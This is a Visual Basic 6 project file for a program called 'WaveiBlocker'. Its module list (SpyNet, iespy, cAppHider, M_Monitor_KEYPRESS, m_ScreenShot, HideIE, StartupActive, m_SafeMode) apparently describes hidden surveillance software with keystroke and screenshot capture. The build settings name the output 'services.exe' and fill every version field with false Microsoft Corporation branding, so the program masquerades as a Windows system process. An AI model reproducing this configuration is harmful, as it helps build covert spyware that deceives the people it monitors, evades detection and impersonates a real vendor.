Type=Exe
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\Windows\SysWOW64\stdole2.tlb#OLE Automation
Reference=*\G{420B2830-E718-11CF-893D-00A0C9054228}#1.0#0#..\..\..\..\Windows\SysWOW64\scrrun.dll#Microsoft Scripting Runtime
Reference=*\G{0E59F1D2-1FBE-11D0-8FF2-00A0D10038BC}#1.0#0#..\..\..\..\Windows\SysWOW64\msscript.ocx#Microsoft Script Control 1.0
Reference=*\G{EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0#..\..\..\..\Windows\SysWOW64\ieframe.dll#Microsoft Internet Controls
Reference=*\G{EF53050B-882E-4776-B643-EDA472E8E3F2}#2.7#0#..\..\..\..\Program Files (x86)\Common Files\System\ado\msado27.tlb#Microsoft ActiveX Data Objects 2.7 Library
Object={EAB22AC0-30C1-11CF-A7EB-0000C05BAE0B}#1.1#0; ieframe.dll
Reference=*\G{EA34409F-4010-4AA5-995F-3492A391A096}#1.0#0#..\..\..\..\Windows\SysWow64\windowslibrary.tlb#windows util
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Object={48E59290-9880-11CF-9754-00AA00C00908}#1.0#0; MSINET.OCX
Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.1#0; MSCOMCTL.OCX
Object={B04F1543-AB52-4195-A706-800ED78D8CAE}#2.0#0; WaveTABS.ocx
Object={86CF1D34-0C5F-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCT2.OCX
Module=m_URL; ..\..\WaveiBlocker\Modules\m_URL.bas
Module=Registry; ..\..\WaveiBlocker\Modules\Registry.bas
Module=mINI; ..\..\WaveiBlocker\Modules\Bas\mINI.bas
Class=cWinVersion; ..\..\WaveiBlocker\Cls\cWinVersion.cls
Class=cAppHider; ..\..\WaveiBlocker\Cls\cAppHider.cls
Module=mDigito; ..\..\WaveiBlocker\Modules\mDigito.bas
Module=kGen; ..\..\WaveiBlocker\Modules\kGen.bas
Module=StartupActive; ..\..\WaveiBlocker\Modules\StartupActive.bas
Module=SpyNet; ..\..\WaveiBlocker\Modules\SpyNet.bas
Form=..\..\WaveiBlocker\frms\FrmMessage1.frm
Module=modGeneral; ..\..\WaveiBlocker\Modules\modGeneral.bas
Module=m_process; ..\..\WaveiBlocker\Modules\m_process.bas
Class=InetExplorer; ..\..\WaveiBlocker\Cls\InetExplorer.cls
Class=c_RegOffline; ..\..\WaveiBlocker\Cls\cRegOffline.cls
Module=modKW; ..\..\WaveiBlocker\Modules\modKW.bas
Module=m_ADO; ..\..\WaveiBlocker\Modules\m_ADO.bas
Form=..\..\WaveiBlocker\frms\FrmMessageApp.frm
Form=..\..\WaveiBlocker\frms\FrmBloqueado.frm
Form=..\..\WaveiBlocker\frms\Password.frm
Module=iesp; ..\..\WaveiBlocker\Modules\iespy.bas
Module=m_Menus; ..\..\WaveiBlocker\Modules\m_Menus.bas
Module=HideIE; ..\..\WaveiBlocker\Modules\Hideie.bas
Module=m_Systray; ..\..\WaveiBlocker\Modules\m_Systray.bas
Module=m_Module_Micro; ..\..\WaveiBlocker\Modules\m_Module_Micro.bas
Form=..\..\WaveiBlocker\frms\frmMains.frm
Module=m_Iexplorer; ..\..\WaveiBlocker\Modules\m_Iexplorer.bas
Module=m_SafeMode; ..\..\WaveiBlocker\Modules\M_SafeMode.bas
Module=m_ScreenShot; ..\..\WaveiBlocker\Modules\m_ScreenShot.bas
Class=cDIBSection; ..\..\WaveiBlocker\Cls\cDIBSection.cls
Module=m_Google; ..\..\WaveiBlocker\Modules\m_Google.bas
Module=m_Ver_IE; ..\..\WaveiBlocker\Modules\m_Ver_IE.bas
Module=M_Monitor_KEYPRESS; ..\..\WaveiBlocker\Modules\M_Monitor_KEYPRESS.bas
Module=Kill_Dupes; ..\..\WaveiBlocker\Modules\Kill_Dupes.bas
Module=m_CloseAPP; ..\..\WaveiBlocker\Modules\m_CloseAPP.bas
Module=Get_WindowsIE; ..\..\WaveiBlocker\Modules\Get_WindowsIE.bas
Class=c_TRIAL; ..\..\WaveiBlocker\Cls\c_Trial.cls
Module=m_DataBases; ..\..\WaveiBlocker\Modules\m_DataBases.bas
Module=m_Functions; ..\..\WaveiBlocker\Modules\m_Functions.bas
Form=..\..\WaveiBlocker\frm\frmPrinter.frm
Class=clsReport; ..\..\WaveiBlocker\Cls\clsReport.cls
Class=clsTableConfig; ..\..\WaveiBlocker\Cls\clsTableConfig.cls
Form=..\..\WaveiBlocker\frm\FrmNetController.frm
Form=..\..\WaveiBlocker\frm\AccountsProgramm.frm
Form=..\..\WaveiBlocker\frm\FrmRegistro.frm
Class=c_Registro; ..\..\WaveiBlocker\Cls\c_Registro.cls
Form=..\..\WaveiBlocker\frm\frmPASSWD.frm
Module=HideFIRE; ..\..\WaveiBlocker\Modules\HideFIRE.bas
Module=HideGoogle; ..\..\WaveiBlocker\Modules\HideGoogle.bas
Form=..\..\WaveiBlocker\frm\FrmStart.frm
Form=..\..\WaveiBlocker\frm\RegistroOFF.frm
IconForm="AccountsProgramm"
Startup="Sub Main"
HelpFile=""
Title="Microsoft"
ExeName32="services.exe"
Path32="..\..\WaveiBlocker"
Command32=""
Name="WaveiBlocker"
HelpContextID="0"
Description="Microsoft Framework"
CompatibleMode="0"
MajorVer=6
MinorVer=0
RevisionVer=1
AutoIncrementVer=1
ServerSupportFiles=0
VersionComments="Microsoft Library"
VersionCompanyName="Microsoft Corporation"
VersionFileDescription="Microsoft Corporation"
VersionLegalCopyright="Microsoft Copyright 2011"
VersionLegalTrademarks="Microsoft Corporation Inc."
VersionProductName="Microsoft VM"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1

[CodeSMART]
Task_UID=25_09_09_00_35_30
